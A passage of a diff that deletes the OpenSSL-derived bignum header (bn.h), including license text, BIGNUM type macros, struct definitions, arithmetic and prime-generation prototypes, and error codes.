- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- *
- * Portions of the attached software ("Contribution") are developed by
- * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
- *
- * The Contribution is licensed pursuant to the Eric Young open source
- * license provided above.
- *
- * The binary polynomial arithmetic software is originally written by
- * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
- *
- */
-
-#ifndef HEADER_BN_H
-#define HEADER_BN_H
-
-#include <stdio.h>
-#include <stdlib.h>
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/ossl_typ.h>
-#include <openssl/crypto.h>
-#include <openssl/bio.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* These preprocessor symbols control various aspects of the bignum headers and
- * library code. They're not defined by any "normal" configuration, as they are
- * intended for development and testing purposes. NB: defining all three can be
- * useful for debugging application code as well as openssl itself.
- *
- * BN_DEBUG - turn on various debugging alterations to the bignum code
- * BN_DEBUG_RAND - uses random poisoning of unused words to trip up
- * mismanagement of bignum internals. You must also define BN_DEBUG.
- */
-/* #define BN_DEBUG */
-/* #define BN_DEBUG_RAND */
-
-#ifndef OPENSSL_SMALL_FOOTPRINT
-#define BN_MUL_COMBA
-#define BN_SQR_COMBA
-#define BN_RECURSION
-#endif
-
-/* This next option uses the C libraries (2 word)/(1 word) function.
- * If it is not defined, I use my C version (which is slower).
- * The reason for this flag is that when the particular C compiler
- * library routine is used, and the library is linked with a different
- * compiler, the library is missing.  This mostly happens when the
- * library is built with gcc and then linked using normal cc.  This would
- * be a common occurrence because gcc normally produces code that is
- * 2 times faster than system compilers for the big number stuff.
- * For machines with only one compiler (or shared libraries), this should
- * be on.  Again this in only really a problem on machines
- * using "long long's", are 32bit, and are not using my assembler code. */
-/* #define BN_DIV2W */
-
-#ifdef _LP64
-#undef	BN_LLONG
-#define BN_ULONG	unsigned long
-#define BN_LONG		long
-#define BN_BITS		128
-#define BN_BYTES	8
-#define BN_BITS2	64
-#define BN_BITS4	32
-#define BN_MASK2	(0xffffffffffffffffL)
-#define BN_MASK2l	(0xffffffffL)
-#define BN_MASK2h	(0xffffffff00000000L)
-#define BN_MASK2h1	(0xffffffff80000000L)
-#define BN_TBIT		(0x8000000000000000L)
-#define BN_DEC_CONV	(10000000000000000000UL)
-#define BN_DEC_FMT1	"%lu"
-#define BN_DEC_FMT2	"%019lu"
-#define BN_DEC_NUM	19
-#define BN_HEX_FMT1	"%lX"
-#define BN_HEX_FMT2	"%016lX"
-#else
-#define BN_ULLONG	unsigned long long
-#define	BN_LLONG
-#define BN_ULONG	unsigned int
-#define BN_LONG		int
-#define BN_BITS		64
-#define BN_BYTES	4
-#define BN_BITS2	32
-#define BN_BITS4	16
-#define BN_MASK		(0xffffffffffffffffLL)
-#define BN_MASK2	(0xffffffffL)
-#define BN_MASK2l	(0xffff)
-#define BN_MASK2h1	(0xffff8000L)
-#define BN_MASK2h	(0xffff0000L)
-#define BN_TBIT		(0x80000000L)
-#define BN_DEC_CONV	(1000000000L)
-#define BN_DEC_FMT1	"%u"
-#define BN_DEC_FMT2	"%09u"
-#define BN_DEC_NUM	9
-#define BN_HEX_FMT1	"%X"
-#define BN_HEX_FMT2	"%08X"
-#endif
-
-#define BN_FLG_MALLOCED		0x01
-#define BN_FLG_STATIC_DATA	0x02
-#define BN_FLG_CONSTTIME	0x04 /* avoid leaking exponent information through timing,
-                                      * BN_mod_exp_mont() will call BN_mod_exp_mont_consttime,
-                                      * BN_div() will call BN_div_no_branch,
-                                      * BN_mod_inverse() will call BN_mod_inverse_no_branch.
-                                      */
-
-#ifndef OPENSSL_NO_DEPRECATED
-#define BN_FLG_EXP_CONSTTIME BN_FLG_CONSTTIME /* deprecated name for the flag */
-                                      /* avoid leaking exponent information through timings
-                                      * (BN_mod_exp_mont() will call BN_mod_exp_mont_consttime) */
-#endif
-
-#ifndef OPENSSL_NO_DEPRECATED
-#define BN_FLG_FREE		0x8000	/* used for debuging */
-#endif
-#define BN_set_flags(b,n)	((b)->flags|=(n))
-#define BN_get_flags(b,n)	((b)->flags&(n))
-
-/* get a clone of a BIGNUM with changed flags, for *temporary* use only
- * (the two BIGNUMs cannot not be used in parallel!) */
-#define BN_with_flags(dest,b,n)  ((dest)->d=(b)->d, \
-                                  (dest)->top=(b)->top, \
-                                  (dest)->dmax=(b)->dmax, \
-                                  (dest)->neg=(b)->neg, \
-                                  (dest)->flags=(((dest)->flags & BN_FLG_MALLOCED) \
-                                                 |  ((b)->flags & ~BN_FLG_MALLOCED) \
-                                                 |  BN_FLG_STATIC_DATA \
-                                                 |  (n)))
-
-struct bignum_st {
-	BN_ULONG *d;	/* Pointer to an array of 'BN_BITS2' bit chunks. */
-	int top;	/* Index of last used d +1. */
-	/* The next are internal book keeping for bn_expand. */
-	int dmax;	/* Size of the d array. */
-	int neg;	/* one if the number is negative */
-	int flags;
-};
-
-/* Used for montgomery multiplication */
-struct bn_mont_ctx_st {
-	int ri;        /* number of bits in R */
-	BIGNUM RR;     /* used to convert to montgomery form */
-	BIGNUM N;      /* The modulus */
-	BIGNUM Ni;     /* R*(1/R mod N) - N*Ni = 1
-	                * (Ni is only stored for bignum algorithm) */
-	BN_ULONG n0[2];/* least significant word(s) of Ni;
-	                  (type changed with 0.9.9, was "BN_ULONG n0;" before) */
-	int flags;
-};
-
-/* Used for reciprocal division/mod functions
- * It cannot be shared between threads
- */
-struct bn_recp_ctx_st {
-	BIGNUM N;	/* the divisor */
-	BIGNUM Nr;	/* the reciprocal */
-	int num_bits;
-	int shift;
-	int flags;
-};
-
-/* Used for slow "generation" functions. */
-struct bn_gencb_st {
-	unsigned int ver;	/* To handle binary (in)compatibility */
-	void *arg;		/* callback-specific data */
-	union {
-		/* if(ver==1) - handles old style callbacks */
-		void (*cb_1)(int, int, void *);
-		/* if(ver==2) - new callback style */
-		int (*cb_2)(int, int, BN_GENCB *);
-	} cb;
-};
-/* Wrapper function to make using BN_GENCB easier,  */
-int BN_GENCB_call(BN_GENCB *cb, int a, int b);
-/* Macro to populate a BN_GENCB structure with an "old"-style callback */
-#define BN_GENCB_set_old(gencb, callback, cb_arg) { \
-		BN_GENCB *tmp_gencb = (gencb); \
-		tmp_gencb->ver = 1; \
-		tmp_gencb->arg = (cb_arg); \
-		tmp_gencb->cb.cb_1 = (callback); }
-/* Macro to populate a BN_GENCB structure with a "new"-style callback */
-#define BN_GENCB_set(gencb, callback, cb_arg) { \
-		BN_GENCB *tmp_gencb = (gencb); \
-		tmp_gencb->ver = 2; \
-		tmp_gencb->arg = (cb_arg); \
-		tmp_gencb->cb.cb_2 = (callback); }
-
-#define BN_prime_checks 0 /* default: select number of iterations
-			     based on the size of the number */
-
-/* number of Miller-Rabin iterations for an error rate  of less than 2^-80
- * for random 'b'-bit input, b >= 100 (taken from table 4.4 in the Handbook
- * of Applied Cryptography [Menezes, van Oorschot, Vanstone; CRC Press 1996];
- * original paper: Damgaard, Landrock, Pomerance: Average case error estimates
- * for the strong probable prime test. -- Math. Comp. 61 (1993) 177-194) */
-#define BN_prime_checks_for_size(b) ((b) >= 1300 ?  2 : \
-                                (b) >=  850 ?  3 : \
-                                (b) >=  650 ?  4 : \
-                                (b) >=  550 ?  5 : \
-                                (b) >=  450 ?  6 : \
-                                (b) >=  400 ?  7 : \
-                                (b) >=  350 ?  8 : \
-                                (b) >=  300 ?  9 : \
-                                (b) >=  250 ? 12 : \
-                                (b) >=  200 ? 15 : \
-                                (b) >=  150 ? 18 : \
-                                /* b >= 100 */ 27)
-
-#define BN_num_bytes(a)	((BN_num_bits(a)+7)/8)
-
-/* Note that BN_abs_is_word didn't work reliably for w == 0 until 0.9.8 */
-#define BN_abs_is_word(a,w) ((((a)->top == 1) && ((a)->d[0] == (BN_ULONG)(w))) || \
-				(((w) == 0) && ((a)->top == 0)))
-#define BN_is_zero(a)       ((a)->top == 0)
-#define BN_is_one(a)        (BN_abs_is_word((a),1) && !(a)->neg)
-#define BN_is_word(a,w)     (BN_abs_is_word((a),(w)) && (!(w) || !(a)->neg))
-#define BN_is_odd(a)	    (((a)->top > 0) && ((a)->d[0] & 1))
-
-#define BN_one(a)	(BN_set_word((a),1))
-#define BN_zero_ex(a) \
-	do { \
-		BIGNUM *_tmp_bn = (a); \
-		_tmp_bn->top = 0; \
-		_tmp_bn->neg = 0; \
-	} while(0)
-
-#ifdef OPENSSL_NO_DEPRECATED
-#define BN_zero(a)	BN_zero_ex(a)
-#else
-#define BN_zero(a)	(BN_set_word((a),0))
-#endif
-
-const BIGNUM *BN_value_one(void);
-char *	BN_options(void);
-BN_CTX *BN_CTX_new(void);
-#ifndef OPENSSL_NO_DEPRECATED
-void	BN_CTX_init(BN_CTX *c);
-#endif
-void	BN_CTX_free(BN_CTX *c);
-void	BN_CTX_start(BN_CTX *ctx);
-BIGNUM *BN_CTX_get(BN_CTX *ctx);
-void	BN_CTX_end(BN_CTX *ctx);
-int     BN_rand(BIGNUM *rnd, int bits, int top, int bottom);
-int     BN_pseudo_rand(BIGNUM *rnd, int bits, int top, int bottom);
-int	BN_rand_range(BIGNUM *rnd, const BIGNUM *range);
-int	BN_pseudo_rand_range(BIGNUM *rnd, const BIGNUM *range);
-int	BN_num_bits(const BIGNUM *a);
-int	BN_num_bits_word(BN_ULONG);
-BIGNUM *BN_new(void);
-void	BN_init(BIGNUM *);
-void	BN_clear_free(BIGNUM *a);
-BIGNUM *BN_copy(BIGNUM *a, const BIGNUM *b);
-void	BN_swap(BIGNUM *a, BIGNUM *b);
-BIGNUM *BN_bin2bn(const unsigned char *s, int len, BIGNUM *ret);
-int	BN_bn2bin(const BIGNUM *a, unsigned char *to);
-BIGNUM *BN_mpi2bn(const unsigned char *s, int len, BIGNUM *ret);
-int	BN_bn2mpi(const BIGNUM *a, unsigned char *to);
-int	BN_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
-int	BN_usub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
-int	BN_uadd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
-int	BN_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b);
-int	BN_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-int	BN_sqr(BIGNUM *r, const BIGNUM *a, BN_CTX *ctx);
-/** BN_set_negative sets sign of a BIGNUM
- * \param  b  pointer to the BIGNUM object
- * \param  n  0 if the BIGNUM b should be positive and a value != 0 otherwise
- */
-void	BN_set_negative(BIGNUM *b, int n);
-/** BN_is_negative returns 1 if the BIGNUM is negative
- * \param  a  pointer to the BIGNUM object
- * \return 1 if a < 0 and 0 otherwise
- */
-#define BN_is_negative(a) ((a)->neg != 0)
-
-#ifndef LIBRESSL_INTERNAL
-int	BN_div(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m, const BIGNUM *d,
-    BN_CTX *ctx);
-#define BN_mod(rem,m,d,ctx) BN_div(NULL,(rem),(m),(d),(ctx))
-#endif
-int	BN_nnmod(BIGNUM *r, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx);
-int	BN_mod_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_add_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m);
-int	BN_mod_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_sub_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m);
-int	BN_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-    const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_lshift1(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_lshift1_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *m);
-int	BN_mod_lshift(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_lshift_quick(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m);
-
-BN_ULONG BN_mod_word(const BIGNUM *a, BN_ULONG w);
-BN_ULONG BN_div_word(BIGNUM *a, BN_ULONG w);
-int	BN_mul_word(BIGNUM *a, BN_ULONG w);
-int	BN_add_word(BIGNUM *a, BN_ULONG w);
-int	BN_sub_word(BIGNUM *a, BN_ULONG w);
-int	BN_set_word(BIGNUM *a, BN_ULONG w);
-BN_ULONG BN_get_word(const BIGNUM *a);
-
-int	BN_cmp(const BIGNUM *a, const BIGNUM *b);
-void	BN_free(BIGNUM *a);
-int	BN_is_bit_set(const BIGNUM *a, int n);
-int	BN_lshift(BIGNUM *r, const BIGNUM *a, int n);
-int	BN_lshift1(BIGNUM *r, const BIGNUM *a);
-int	BN_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-
-#ifndef LIBRESSL_INTERNAL
-int	BN_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx);
-int	BN_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
-#endif
-int BN_mod_exp_mont_consttime(BIGNUM *rr, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *in_mont);
-int	BN_mod_exp_mont_word(BIGNUM *r, BN_ULONG a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
-int	BN_mod_exp2_mont(BIGNUM *r, const BIGNUM *a1, const BIGNUM *p1,
-    const BIGNUM *a2, const BIGNUM *p2, const BIGNUM *m,
-    BN_CTX *ctx, BN_MONT_CTX *m_ctx);
-int	BN_mod_exp_simple(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx);
-
-int	BN_mask_bits(BIGNUM *a, int n);
-int	BN_print_fp(FILE *fp, const BIGNUM *a);
-int	BN_print(BIO *fp, const BIGNUM *a);
-int	BN_reciprocal(BIGNUM *r, const BIGNUM *m, int len, BN_CTX *ctx);
-int	BN_rshift(BIGNUM *r, const BIGNUM *a, int n);
-int	BN_rshift1(BIGNUM *r, const BIGNUM *a);
-void	BN_clear(BIGNUM *a);
-BIGNUM *BN_dup(const BIGNUM *a);
-int	BN_ucmp(const BIGNUM *a, const BIGNUM *b);
-int	BN_set_bit(BIGNUM *a, int n);
-int	BN_clear_bit(BIGNUM *a, int n);
-char *	BN_bn2hex(const BIGNUM *a);
-char *	BN_bn2dec(const BIGNUM *a);
-int 	BN_hex2bn(BIGNUM **a, const char *str);
-int 	BN_dec2bn(BIGNUM **a, const char *str);
-int	BN_asc2bn(BIGNUM **a, const char *str);
-#ifndef LIBRESSL_INTERNAL
-int	BN_gcd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx);
-#endif
-int	BN_kronecker(const BIGNUM *a,const BIGNUM *b,BN_CTX *ctx); /* returns -2 for error */
-#ifndef LIBRESSL_INTERNAL
-BIGNUM *BN_mod_inverse(BIGNUM *ret,
-    const BIGNUM *a, const BIGNUM *n, BN_CTX *ctx);
-#endif
-BIGNUM *BN_mod_sqrt(BIGNUM *ret,
-    const BIGNUM *a, const BIGNUM *n, BN_CTX *ctx);
-
-void	BN_consttime_swap(BN_ULONG swap, BIGNUM *a, BIGNUM *b, int nwords);
-
-/* Deprecated versions */
-#ifndef OPENSSL_NO_DEPRECATED
-BIGNUM *BN_generate_prime(BIGNUM *ret, int bits, int safe,
-    const BIGNUM *add, const BIGNUM *rem,
-    void (*callback)(int, int, void *), void *cb_arg);
-int	BN_is_prime(const BIGNUM *p, int nchecks,
-    void (*callback)(int, int, void *),
-    BN_CTX *ctx, void *cb_arg);
-int	BN_is_prime_fasttest(const BIGNUM *p, int nchecks,
-    void (*callback)(int, int, void *), BN_CTX *ctx, void *cb_arg,
-    int do_trial_division);
-#endif /* !defined(OPENSSL_NO_DEPRECATED) */
-
-/* Newer versions */
-int	BN_generate_prime_ex(BIGNUM *ret, int bits, int safe, const BIGNUM *add,
-    const BIGNUM *rem, BN_GENCB *cb);
-int	BN_is_prime_ex(const BIGNUM *p, int nchecks, BN_CTX *ctx, BN_GENCB *cb);
-int	BN_is_prime_fasttest_ex(const BIGNUM *p, int nchecks, BN_CTX *ctx,
-    int do_trial_division, BN_GENCB *cb);
-
-int BN_X931_generate_Xpq(BIGNUM *Xp, BIGNUM *Xq, int nbits, BN_CTX *ctx);
-
-int BN_X931_derive_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2,
-    const BIGNUM *Xp, const BIGNUM *Xp1, const BIGNUM *Xp2,
-    const BIGNUM *e, BN_CTX *ctx, BN_GENCB *cb);
-int BN_X931_generate_prime_ex(BIGNUM *p, BIGNUM *p1, BIGNUM *p2,
-    BIGNUM *Xp1, BIGNUM *Xp2,
-    const BIGNUM *Xp,
-    const BIGNUM *e, BN_CTX *ctx,
-    BN_GENCB *cb);
-
-BN_MONT_CTX *BN_MONT_CTX_new(void );
-void BN_MONT_CTX_init(BN_MONT_CTX *ctx);
-int BN_mod_mul_montgomery(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-    BN_MONT_CTX *mont, BN_CTX *ctx);
-#define BN_to_montgomery(r,a,mont,ctx)	BN_mod_mul_montgomery(\
-	(r),(a),&((mont)->RR),(mont),(ctx))
-int BN_from_montgomery(BIGNUM *r, const BIGNUM *a,
-    BN_MONT_CTX *mont, BN_CTX *ctx);
-void BN_MONT_CTX_free(BN_MONT_CTX *mont);
-int BN_MONT_CTX_set(BN_MONT_CTX *mont, const BIGNUM *mod, BN_CTX *ctx);
-BN_MONT_CTX *BN_MONT_CTX_copy(BN_MONT_CTX *to, BN_MONT_CTX *from);
-BN_MONT_CTX *BN_MONT_CTX_set_locked(BN_MONT_CTX **pmont, int lock,
-    const BIGNUM *mod, BN_CTX *ctx);
-
-/* BN_BLINDING flags */
-#define	BN_BLINDING_NO_UPDATE	0x00000001
-#define	BN_BLINDING_NO_RECREATE	0x00000002
-
-BN_BLINDING *BN_BLINDING_new(const BIGNUM *A, const BIGNUM *Ai, BIGNUM *mod);
-void BN_BLINDING_free(BN_BLINDING *b);
-int BN_BLINDING_update(BN_BLINDING *b, BN_CTX *ctx);
-int BN_BLINDING_convert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
-int BN_BLINDING_invert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx);
-int BN_BLINDING_convert_ex(BIGNUM *n, BIGNUM *r, BN_BLINDING *b, BN_CTX *);
-int BN_BLINDING_invert_ex(BIGNUM *n, const BIGNUM *r, BN_BLINDING *b, BN_CTX *);
-#ifndef OPENSSL_NO_DEPRECATED
-unsigned long BN_BLINDING_get_thread_id(const BN_BLINDING *);
-void BN_BLINDING_set_thread_id(BN_BLINDING *, unsigned long);
-#endif
-CRYPTO_THREADID *BN_BLINDING_thread_id(BN_BLINDING *);
-unsigned long BN_BLINDING_get_flags(const BN_BLINDING *);
-void BN_BLINDING_set_flags(BN_BLINDING *, unsigned long);
-BN_BLINDING *BN_BLINDING_create_param(BN_BLINDING *b,
-    const BIGNUM *e, BIGNUM *m, BN_CTX *ctx,
-    int (*bn_mod_exp)(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx),
-    BN_MONT_CTX *m_ctx);
-
-#ifndef OPENSSL_NO_DEPRECATED
-void BN_set_params(int mul, int high, int low, int mont);
-int BN_get_params(int which); /* 0, mul, 1 high, 2 low, 3 mont */
-#endif
-
-void	BN_RECP_CTX_init(BN_RECP_CTX *recp);
-BN_RECP_CTX *BN_RECP_CTX_new(void);
-void	BN_RECP_CTX_free(BN_RECP_CTX *recp);
-int	BN_RECP_CTX_set(BN_RECP_CTX *recp, const BIGNUM *rdiv, BN_CTX *ctx);
-int	BN_mod_mul_reciprocal(BIGNUM *r, const BIGNUM *x, const BIGNUM *y,
-    BN_RECP_CTX *recp, BN_CTX *ctx);
-int	BN_mod_exp_recp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-    const BIGNUM *m, BN_CTX *ctx);
-int	BN_div_recp(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m,
-    BN_RECP_CTX *recp, BN_CTX *ctx);
-
-#ifndef OPENSSL_NO_EC2M
-
-/* Functions for arithmetic over binary polynomials represented by BIGNUMs.
- *
- * The BIGNUM::neg property of BIGNUMs representing binary polynomials is
- * ignored.
- *
- * Note that input arguments are not const so that their bit arrays can
- * be expanded to the appropriate size if needed.
- */
-
-int	BN_GF2m_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); /*r = a + b*/
-#define BN_GF2m_sub(r, a, b) BN_GF2m_add(r, a, b)
-int	BN_GF2m_mod(BIGNUM *r, const BIGNUM *a, const BIGNUM *p); /*r=a mod p*/
-int
-BN_GF2m_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const BIGNUM *p, BN_CTX *ctx); /* r = (a * b) mod p */
-int
-BN_GF2m_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-	BN_CTX *ctx); /* r = (a * a) mod p */
-int
-BN_GF2m_mod_inv(BIGNUM *r, const BIGNUM *b, const BIGNUM *p,
-	BN_CTX *ctx); /* r = (1 / b) mod p */
-int
-BN_GF2m_mod_div(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const BIGNUM *p, BN_CTX *ctx); /* r = (a / b) mod p */
-int
-BN_GF2m_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const BIGNUM *p, BN_CTX *ctx); /* r = (a ^ b) mod p */
-int
-BN_GF2m_mod_sqrt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-	BN_CTX *ctx); /* r = sqrt(a) mod p */
-int	BN_GF2m_mod_solve_quad(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
-	BN_CTX *ctx); /* r^2 + r = a mod p */
-#define BN_GF2m_cmp(a, b) BN_ucmp((a), (b))
-/* Some functions allow for representation of the irreducible polynomials
- * as an unsigned int[], say p.  The irreducible f(t) is then of the form:
- *     t^p[0] + t^p[1] + ... + t^p[k]
- * where m = p[0] > p[1] > ... > p[k] = 0.
- */
-int	BN_GF2m_mod_arr(BIGNUM *r, const BIGNUM *a, const int p[]);
-/* r = a mod p */
-int BN_GF2m_mod_mul_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const int p[], BN_CTX *ctx); /* r = (a * b) mod p */
-int BN_GF2m_mod_sqr_arr(BIGNUM *r, const BIGNUM *a, const int p[],
-	BN_CTX *ctx); /* r = (a * a) mod p */
-int BN_GF2m_mod_inv_arr(BIGNUM *r, const BIGNUM *b, const int p[],
-	BN_CTX *ctx); /* r = (1 / b) mod p */
-int	BN_GF2m_mod_div_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const int p[], BN_CTX *ctx); /* r = (a / b) mod p */
-int	BN_GF2m_mod_exp_arr(BIGNUM *r, const BIGNUM *a, const BIGNUM *b,
-	const int p[], BN_CTX *ctx); /* r = (a ^ b) mod p */
-int	BN_GF2m_mod_sqrt_arr(BIGNUM *r, const BIGNUM *a,
-	const int p[], BN_CTX *ctx); /* r = sqrt(a) mod p */
-int	BN_GF2m_mod_solve_quad_arr(BIGNUM *r, const BIGNUM *a,
-	const int p[], BN_CTX *ctx); /* r^2 + r = a mod p */
-int	BN_GF2m_poly2arr(const BIGNUM *a, int p[], int max);
-int	BN_GF2m_arr2poly(const int p[], BIGNUM *a);
-
-#endif
-
-/* faster mod functions for the 'NIST primes'
- * 0 <= a < p^2 */
-int BN_nist_mod_192(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-int BN_nist_mod_224(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-int BN_nist_mod_256(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-int BN_nist_mod_384(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-int BN_nist_mod_521(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx);
-
-const BIGNUM *BN_get0_nist_prime_192(void);
-const BIGNUM *BN_get0_nist_prime_224(void);
-const BIGNUM *BN_get0_nist_prime_256(void);
-const BIGNUM *BN_get0_nist_prime_384(void);
-const BIGNUM *BN_get0_nist_prime_521(void);
-
-/* Primes from RFC 2409 */
-BIGNUM *get_rfc2409_prime_768(BIGNUM *bn);
-BIGNUM *get_rfc2409_prime_1024(BIGNUM *bn);
-
-/* Primes from RFC 3526 */
-BIGNUM *get_rfc3526_prime_1536(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_2048(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_3072(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_4096(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_6144(BIGNUM *bn);
-BIGNUM *get_rfc3526_prime_8192(BIGNUM *bn);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_BN_strings(void);
-
-/* Error codes for the BN functions. */
-
-/* Function codes. */
-#define BN_F_BNRAND					 127
-#define BN_F_BN_BLINDING_CONVERT_EX			 100
-#define BN_F_BN_BLINDING_CREATE_PARAM			 128
-#define BN_F_BN_BLINDING_INVERT_EX			 101
-#define BN_F_BN_BLINDING_NEW				 102
-#define BN_F_BN_BLINDING_UPDATE				 103
-#define BN_F_BN_BN2DEC					 104
-#define BN_F_BN_BN2HEX					 105
-#define BN_F_BN_CTX_GET					 116
-#define BN_F_BN_CTX_NEW					 106
-#define BN_F_BN_CTX_START				 129
-#define BN_F_BN_DIV					 107
-#define BN_F_BN_DIV_NO_BRANCH				 138
-#define BN_F_BN_DIV_RECP				 130
-#define BN_F_BN_EXP					 123
-#define BN_F_BN_EXPAND2					 108
-#define BN_F_BN_GENERATE_PRIME_EX			 140
-#define BN_F_BN_EXPAND_INTERNAL				 120
-#define BN_F_BN_GF2M_MOD				 131
-#define BN_F_BN_GF2M_MOD_EXP				 132
-#define BN_F_BN_GF2M_MOD_MUL				 133
-#define BN_F_BN_GF2M_MOD_SOLVE_QUAD			 134
-#define BN_F_BN_GF2M_MOD_SOLVE_QUAD_ARR			 135
-#define BN_F_BN_GF2M_MOD_SQR				 136
-#define BN_F_BN_GF2M_MOD_SQRT				 137
-#define BN_F_BN_MOD_EXP2_MONT				 118
-#define BN_F_BN_MOD_EXP_MONT				 109
-#define BN_F_BN_MOD_EXP_MONT_CONSTTIME			 124
-#define BN_F_BN_MOD_EXP_MONT_WORD			 117
-#define BN_F_BN_MOD_EXP_RECP				 125
-#define BN_F_BN_MOD_EXP_SIMPLE				 126
-#define BN_F_BN_MOD_INVERSE				 110
-#define BN_F_BN_MOD_INVERSE_NO_BRANCH			 139
-#define BN_F_BN_MOD_LSHIFT_QUICK			 119
-#define BN_F_BN_MOD_MUL_RECIPROCAL			 111
-#define BN_F_BN_MOD_SQRT				 121
-#define BN_F_BN_MPI2BN					 112
-#define BN_F_BN_NEW					 113
-#define BN_F_BN_RAND					 114
-#define BN_F_BN_RAND_RANGE				 122
-#define BN_F_BN_USUB					 115
-
-/* Reason codes. */
-#define BN_R_ARG2_LT_ARG3				 100
-#define BN_R_BAD_RECIPROCAL				 101
-#define BN_R_BIGNUM_TOO_LONG				 114
-#define BN_R_BITS_TOO_SMALL				 117
-#define BN_R_CALLED_WITH_EVEN_MODULUS			 102
